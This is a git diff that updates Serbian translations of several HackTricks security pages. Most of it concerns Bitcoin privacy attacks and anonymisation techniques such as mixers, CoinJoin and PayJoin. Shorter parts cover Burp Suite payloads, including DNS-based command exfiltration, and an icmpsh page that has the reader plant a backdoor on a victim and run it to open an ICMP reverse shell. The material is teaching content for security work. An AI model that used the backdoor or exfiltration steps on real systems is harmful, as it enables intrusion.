privatnost transakcija i anonimnost korisnika često su predmeti zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda putem kojih napadači mogu ugroziti privatnost Bitcoina. ## **Pretpostavka o Zajedničkom Vlasništvu Ulaza** -Uobičajeno je da se ulazi različitih korisnika retko kombinuju u jednoj transakciji zbog složenosti. Stoga, **dve adrese ulaza u istoj transakciji često se smatraju da pripadaju istom vlasniku**. +Općenito je retko da ulazi od različitih korisnika budu kombinovani u jednoj transakciji zbog uključene složenosti. Stoga, **dva ulazna adresa u istoj transakciji često se pretpostavljaju da pripadaju istom vlasniku**. -## **Detekcija Adrese za Promenu UTXO** +## **Detekcija Adrese Promene UTXO** -UTXO, ili **Unspent Transaction Output**, mora biti u potpunosti potrošen u transakciji. Ako samo deo njega bude poslat na drugu adresu, preostali deo ide na novu adresu za promenu. Posmatrači mogu pretpostaviti da ova nova adresa pripada pošiljaocu, ugrožavajući privatnost. +UTXO, ili **Neiskorišćeni Izlaz Transakcije**, mora biti u potpunosti potrošen u transakciji. Ako se samo deo njega pošalje na drugu adresu, preostali deo ide na novu adresu promene. Posmatrači mogu pretpostaviti da nova adresa pripada pošiljaocu, ugrožavajući privatnost. ### Primer -Da bi se to izbeglo, mikseri ili korišćenje više adresa mogu pomoći u zamagljivanju vlasništva. +Da bi se to izbeglo, usluge mešanja ili korišćenje više adresa mogu pomoći u zamagljivanju vlasništva. ## **Izloženost na Društvenim Mrežama i Forumima** -Korisnici ponekad dele svoje Bitkoin adrese na mreži, što olakšava povezivanje adrese sa njenim vlasnikom. +Korisnici ponekad dele svoje Bitcoin adrese na mreži, čime postaje **lako povezati adresu sa njenim vlasnikom**. ## **Analiza Grafa Transakcija** Transakcije se mogu vizualizovati kao grafovi, otkrivajući potencijalne veze između korisnika na osnovu toka sredstava. -## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika za Promenu)** +## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika Promene)** -Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pretpostavilo koji izlaz predstavlja promenu koja se vraća pošiljaocu. +Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pretpostavilo koji izlaz je promena koja se vraća pošiljaocu. ### Primer ```bash 2 btc --> 4 btc 3 btc 1 btc ``` -## **Prisilno ponovno korišćenje adresa** +## **Prinuda Ponovne Upotrebe Adrese** -Napadači mogu poslati male iznose na prethodno korišćene adrese, nadajući se da će primalac te adrese kombinovati te iznose sa drugim ulazima u budućim transakcijama, čime će povezati adrese. +Napadači mogu poslati male iznose na prethodno korišćene adrese, nadajući se da će primalac te iznose kombinovati sa drugim ulazima u budućim transakcijama, čime se povezuju adrese. -### Ispravno ponašanje novčanika -Novčanici bi trebali izbegavati korišćenje novčića primljenih na već korišćenim, praznim adresama kako bi se sprečilo otkrivanje privatnosti. +### Ispravno Ponašanje Novčanika +Novčanici treba da izbegavaju korišćenje novčića primljenih na već korišćenim, praznim adresama kako bi sprečili ovaj curenje privatnosti. -## **Druge tehnike analize blokčejna** +## **Druge Tehnike Analize Blokčejna** -- **Tačni iznosi plaćanja:** Transakcije bez promene verovatno su između dve adrese koje pripadaju istom korisniku. -- **Okrugli iznosi:** Okrugao iznos u transakciji sugeriše da je to plaćanje, pri čemu je izlaz koji nije okrugao verovatno promena. -- **Identifikacija novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što omogućava analitičarima da identifikuju korišćeni softver i potencijalno adresu za promenu. -- **Korelacije iznosa i vremena:** Otkrivanje vremena ili iznosa transakcija može dovesti do praćenja transakcija. +- **Tačni Iznosi Plaćanja:** Transakcije bez kusura verovatno su između dve adrese koje pripadaju istom korisniku. +- **Zaokruženi Brojevi:** Zaokružen broj u transakciji sugeriše da je to plaćanje, pri čemu je izlaz koji nije zaokružen verovatno kusur. +- **Identifikacija Novčanika:** Različiti novčanici imaju jedinstvene obrasce kreiranja transakcija, što analitičarima omogućava da identifikuju korišćeni softver i potencijalno adresu kusura. +- **Korelacije Iznosa i Vremena:** Otkrivanje vremena ili iznosa transakcije može učiniti transakcije pratljivim. -## **Analiza saobraćaja** +## **Analiza Saobraćaja** -Prateći saobraćaj na mreži, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet ima mnogo Bitcoin čvorova, što povećava njihovu sposobnost praćenja transakcija. +Prateći mrežni saobraćaj, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogo Bitcoin čvorova, poboljšavajući njihovu sposobnost praćenja transakcija. -## Više informacija -Za sveobuhvatan spisak napada na privatnost i odbrana, posetite [Bitcoin Privacy na Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +## Više +Za sveobuhvatan spisak napada na privatnost i odbrane, posetite [Privatnost Bitkoina na Bitkoin Wiki](https://en.bitcoin.it/wiki/Privacy). -# Anonimne Bitcoin transakcije +# Anonimne Bitkoin Transakcije -## Načini anonimnog dobijanja Bitcoina +## Načini za Anonimno Dobijanje Bitkoina -- **Gotovinske transakcije**: Dobijanje Bitcoina putem gotovine. -- **Alternativne gotovinske opcije**: Kupovina poklon kartica i njihova zamena za Bitcoin putem interneta. -- **Rudarenje**: Najprivatniji način za zaradu Bitcoina je rudarenje, posebno kada se radi samostalno, jer rudarski bazeni mogu znati IP adresu rudara. [Informacije o rudarskim bazenima](https://en.bitcoin.it/wiki/Pooled_mining) -- **Krađa**: Teorijski, krađa Bitcoina može biti još jedan način anonimnog dobijanja, iako je ilegalna i nije preporučljiva. +- **Gotovinske Transakcije**: Dobijanje bitkoina putem gotovine. +- **Alternativne Gotovinske Opcije**: Kupovina poklon kartica i razmena istih za bitkoin online. +- **Rudarenje**: Najprivatniji način za zaradu bitkoina je putem rudarenja, posebno kada se radi samostalno jer rudarski bazeni mogu znati IP adresu rudara. [Informacije o Rudarskim Bazenima](https://en.bitcoin.it/wiki/Pooled_mining) +- **Krađa**: Teorijski, krađa bitkoina mogla bi biti još jedan način za anonimno sticanje istih, iako je ilegalna i nije preporučljiva. -## Usluge mešanja +## Usluge Mešanja -Korišćenjem usluge mešanja, korisnik može **poslati Bitcoine** i dobiti **različite Bitcoine zauzvrat**, što otežava praćenje originalnog vlasnika. Međutim, ovo zahteva poverenje u uslugu da ne čuva logove i da zaista vrati Bitcoine. Alternativne opcije za mešanje uključuju Bitcoin kazina. +Korišćenjem usluge mešanja, korisnik može **poslati bitkoine** i dobiti **različite bitkoine zauzvrat**, što otežava praćenje originalnog vlasnika. Ipak, ovo zahteva poverenje u uslugu da ne čuva logove i da zapravo vrati bitkoine. Alternativne opcije mešanja uključuju Bitkoin kazina. ## CoinJoin -**CoinJoin** spaja više transakcija različitih korisnika u jednu, otežavajući proces svima koji pokušavaju da upare ulaze i izlaze. Uprkos njegovoj efikasnosti, transakcije sa jedinstvenim veličinama ulaza i izlaza i dalje mogu potencijalno biti praćene. +**CoinJoin** spaja više transakcija različitih korisnika u jednu, komplikujući proces za svakoga ko pokušava da upari ulaze sa izlazima. Uprkos njegovoj efikasnosti, transakcije sa jedinstvenim veličinama ulaza i izlaza i dalje mogu potencijalno biti praćene. Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereumu, pogledajte [Tornado Cash](https://tornado.cash), koji anonimizuje transakcije sa sredstvima od rudara. +Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereumu, pogledajte [Tornado Cash](https://tornado.cash), koji anonimizira transakcije sa sredstvima od rudara. ## PayJoin -Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (na primer, kupca i trgovca) kao običnu transakciju, bez karakterističnih jednakih izlaza koje ima CoinJoin. Ovo ga čini izuzetno teškim za otkrivanje i može poništiti heuristiku o zajedničkom vlasništvu ulaza koju koriste entiteti za nadzor transakcija. +Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza karakterističnih za CoinJoin. Ovo ga čini izuzetno teškim za otkrivanje i moglo bi poništiti heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` Transakcije poput one iznad mogu biti PayJoin, poboljšavajući privatnost dok ostaju neodvojive od standardnih bitkoin transakcija. -**Upotreba PayJoin-a može značajno poremetiti tradicionalne metode nadzora**, što je obećavajući razvoj u potrazi za transakcijskom privatnošću. +**Korišćenje PayJoin-a može značajno poremetiti tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću. # Najbolje prakse za privatnost u kriptovalutama ## **Tehnike sinhronizacije novčanika** -Da bi se održala privatnost i sigurnost, ključno je sinhronizovati novčanike sa blokčejnom. Dve metode se ističu: +Za održavanje privatnosti i sigurnosti, sinhronizacija novčanika sa blokčejnom je ključna. Ističu se dva metoda: -- **Puni čvor**: Preuzimanjem celokupnog blokčejna, puni čvor obezbeđuje maksimalnu privatnost. Sve transakcije ikada izvršene se čuvaju lokalno, što onemogućava protivnicima da identifikuju koje transakcije ili adrese korisniku predstavljaju interes. -- **Filtriranje blokova na strani klijenta**: Ova metoda podrazumeva kreiranje filtera za svaki blok u blokčejnu, omogućavajući novčanicima da identifikuju relevantne transakcije bez otkrivanja specifičnih interesa posmatračima na mreži. Lagani novčanici preuzimaju ove filtere, preuzimajući pune blokove samo kada se pronađe podudaranje sa adresama korisnika. +- **Puni čvor**: Preuzimanjem celog blokčejna, puni čvor obezbeđuje maksimalnu privatnost. Sve transakcije ikada napravljene se čuvaju lokalno, čineći nemogućim da protivnici identifikuju koje transakcije ili adrese korisniku interesuju. +- **Filtriranje blokova na strani klijenta**: Ovaj metod uključuje kreiranje filtera za svaki blok u blokčejnu, omogućavajući novčanicima da identifikuju relevantne transakcije bez otkrivanja specifičnih interesa mrežnim posmatračima. Lagani novčanici preuzimaju ove filtere, samo preuzimajući pune blokove kada se pronađe podudaranje sa adresama korisnika. -## **Korišćenje Tor-a za anonimnost** +## **Korišćenje Tora za anonimnost** -S obzirom da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tor-a kako bi se sakrila IP adresa i poboljšala privatnost prilikom interakcije sa mrežom. +S obzirom da Bitkoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora kako bi se sakrila vaša IP adresa, poboljšavajući privatnost prilikom interakcije sa mrežom. ## **Prevencija ponovne upotrebe adresa** -Da bi se zaštitila privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može ugroziti privatnost povezivanjem transakcija sa istim entitetom. Moderne novčanike odvraćaju od ponovne upotrebe adresa svojim dizajnom. +Da bi se sačuvala privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može ugroziti privatnost povezivanjem transakcija sa istim entitetom. Moderni novčanici odvraćaju od ponovne upotrebe adresa svojim dizajnom. ## **Strategije za privatnost transakcija** -- **Više transakcija**: Podela plaćanja na nekoliko transakcija može zamagliti iznos transakcije i ometati napade na privatnost. -- **Izbegavanje kusura**: Odabir transakcija koje ne zahtevaju izlaz za kusur poboljšava privatnost ometanjem metoda za otkrivanje kusura. -- **Više izlaza za kusur**: Ako izbegavanje kusura nije izvodljivo, generisanje više izlaza za kusur i dalje može poboljšati privatnost. +- **Višestruke transakcije**: Deljenje plaćanja na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost. +- **Izbegavanje kusura**: Odabir transakcija koje ne zahtevaju izlaz za kusur poboljšava privatnost ometanjem metoda detekcije kusura. +- **Višestruki izlazi za kusur**: Ako izbegavanje kusura nije izvodljivo, generisanje više izlaza za kusur i dalje može poboljšati privatnost. # **Monero: Znak anonimnosti** -Monero se bavi potrebom za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visok standard za privatnost. +Monero adresira potrebu za apsolutnom anonimnošću u digitalnim transakcijama, postavljajući visok standard za privatnost. -# **Ethereum: Gas i transakcije** +# **Ethereum: Gas i Transakcije** ## **Razumevanje Gasa** -Gas meri računarski napor potreban za izvršavanje operacija na Ethereumu, ceneći se u **gwei**-ima. Na primer, transakcija koja košta 2.310.000 gwei (ili 0,00231 ETH) uključuje limit gasa i osnovnu naknadu, sa napojnicom za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi se osigurali da ne preplaćuju, a višak se vraća. +Gas meri računarski napor potreban za izvršavanje operacija na Ethereumu, cenjen u **gwei**-ima. Na primer, transakcija koja košta 2.310.000 gwei (ili 0,00231 ETH) uključuje limit gasa, osnovnu naknadu i napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi se osigurali da ne preplate, sa vraćanjem viška. ## **Izvršavanje transakcija** -Transakcije na Ethereumu uključuju pošiljaoca i primaoca, koji mogu biti korisničke ili pametne ugovorne adrese. One zahtevaju naknadu i moraju biti rudarene. Bitne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcioni podaci, limit gasa i naknade. Važno je napomenuti da se adresa pošiljaoca izvodi iz potpisa, čime se eliminiše potreba za njom u podacima transakcije. +Transakcije na Ethereumu uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. Zahtevaju naknadu i moraju biti rudarene. Bitne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcioni podaci, limit gasa i naknade. Važno je napomenuti da se adresa pošiljaoca dedukuje iz potpisa, eliminišući potrebu za njom u podacima transakcije. -Ove prakse i mehanizmi su osnovni za sve one koji žele da se bave kriptovalutama uz prioritetizaciju privatnosti i sigurnosti. +Ove prakse i mehanizmi su osnovni za svakoga ko želi da se bavi kriptovalutama uz prioritizaciju privatnosti i sigurnosti. ## Reference @@ -189,18 +190,3 @@ Ove prakse i mehanizmi su osnovni za sve one koji žele da se bave kriptovalutam * [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) * [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) - - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju oglašenu u HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, pogledajte [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/burp-suite.md b/burp-suite.md index 01ab5fa50..bf318d389 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,24 +1,25 @@ +{% hint style="success" %} +Učite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Osnovni Payloadi * **Jednostavna Lista:** Samo lista koja sadrži unos u svakom redu -* **Runtime Fajl:** Lista čitana u vreme izvršavanja (nije učitana u memoriju). Za podršku velikim listama. -* **Modifikacija Velikih Slova:** Primena promena na listu stringova (Bez promene, malim slovima, VELIKIM SLOVIMA, Prvo veliko slovo i ostalo malim slovima, Prvo veliko slovo i ostalo nepromenjeno). -* **Brojevi:** Generisanje brojeva od X do Y koristeći korak Z ili nasumično. +* **Runtime Fajl:** Lista koja se čita u vreme izvršavanja (ne učitana u memoriju). Za podršku velikim listama. +* **Modifikacija slučaja:** Primenite neke promene na listu stringova (Bez promene, u mala slova, u VELIKA SLOVA, u Pravo ime - Prvo veliko slovo i ostalo u mala-, u Pravo Ime - Prvo veliko slovo i ostalo ostaje isto-. +* **Brojevi:** Generišite brojeve od X do Y koristeći korak Z ili nasumično. * **Brute Forcer:** Skup karaktera, minimalna i maksimalna dužina. [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload za izvršavanje komandi i preuzimanje izlaza putem DNS zahteva ka burpcollab. @@ -26,18 +27,3 @@ Drugi načini podrške HackTricks-u: {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) - - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/c2/icmpsh.md b/c2/icmpsh.md index 49ccf74d9..a9c88217d 100644 --- a/c2/icmpsh.md +++ b/c2/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} Preuzmite backdoor sa: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -35,16 +36,17 @@ Postavite **icmpsh.exe** na žrtvu i izvršite: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks obuka AWS Crveni Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks obuka GCP Crveni Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini da podržite HackTricks: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/crypto-and-stego/blockchain-and-crypto-currencies.md b/crypto-and-stego/blockchain-and-crypto-currencies.md index 8bcda9e5a..142a6db42 100644 --- a/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Osnovni Koncepti @@ -18,13 +19,13 @@ Drugi načini podrške HackTricks-u: - **Pametni Ugovori** su programi koji se izvršavaju na blockchain-u kada se ispune određeni uslovi, automatizujući izvršenje sporazuma bez posrednika. - **Decentralizovane Aplikacije (dApps)** se grade na pametnim ugovorima, sa korisnički prijateljskim front-endom i transparentnim, revizibilnim back-endom. - **Tokeni & Kovanice** se razlikuju gde kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima. -- **Utilitarni Tokeni** omogućavaju pristup uslugama, a **Sigurnosni Tokeni** označavaju vlasništvo nad imovinom. +- **Tokeni za Upotrebu** omogućavaju pristup uslugama, a **Tokeni za Bezbednost** označavaju vlasništvo nad imovinom. - **DeFi** označava Decentralizovanu Finansiju, nudeći finansijske usluge bez centralnih autoriteta. - **DEX** i **DAOs** se odnose na Decentralizovane Platforme za Razmenu i Decentralizovane Autonomne Organizacije, redom. ## Mehanizmi Konsenzusa -Mehanizmi konsenzusa osiguravaju sigurne i usaglašene validacije transakcija na blockchain-u: +Mehanizmi konsenzusa osiguravaju sigurnu i dogovorenu validaciju transakcija na blockchain-u: - **Dokaz o Radu (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija. - **Dokaz o Deoničarstvu (PoS)** zahteva od validatara da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW-om. @@ -36,7 +37,7 @@ Bitkoin transakcije uključuju prenos sredstava između adresa. Transakcije se v #### Ključni Elementi: -- **Multisignature Transakcije** zahtevaju više potpisa za autorizaciju transakcije. +- **Transakcije sa Više Potpisa** zahtevaju više potpisa za autorizaciju transakcije. - Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije). ### Mreža Munje @@ -49,7 +50,7 @@ Napadi na privatnost, poput **Zajedničkog Vlasništva Ulaza** i **Detekcije Adr ## Anonimno Sticanje Bitkoina -Metode uključuju trgovinu gotovinom, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoin-ove kao redovne transakcije za veću privatnost. +Metode uključuju gotovinske razmene, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoin-ove kao redovne transakcije za pojačanu privatnost. # Napadi na Privatnost Bitkoina @@ -60,7 +61,7 @@ U svetu Bitkoina, privatnost transakcija i anonimnost korisnika često su predme ## **Pretpostavka o Zajedničkom Vlasništvu Ulaza** -Uglavnom je retko da ulazi od različitih korisnika budu kombinovani u jednoj transakciji zbog složenosti uključene. Stoga se **dva ulazna adresa u istoj transakciji često smatraju da pripadaju istom vlasniku**. +Općenito je retko da ulazi od različitih korisnika budu kombinovani u jednoj transakciji zbog složenosti uključene. Stoga, **dva ulazna adresa u istoj transakciji često se pretpostavljaju da pripadaju istom vlasniku**. ## **Detekcija Adrese Promene UTXO** @@ -86,7 +87,7 @@ Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi 2 btc --> 4 btc 3 btc 1 btc ``` -## **Prinudno Ponovno Korišćenje Adresa** +## **Prisiljeno Ponovno Korišćenje Adresa** Napadači mogu poslati male iznose na prethodno korišćene adrese, nadajući se da će primalac te iznose kombinovati sa drugim ulazima u budućim transakcijama, čime se povezuju adrese. @@ -102,19 +103,19 @@ Novčanici treba da izbegavaju korišćenje novčića primljenih na već koriš ## **Analiza Saobraćaja** -Prateći mrežni saobraćaj, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, 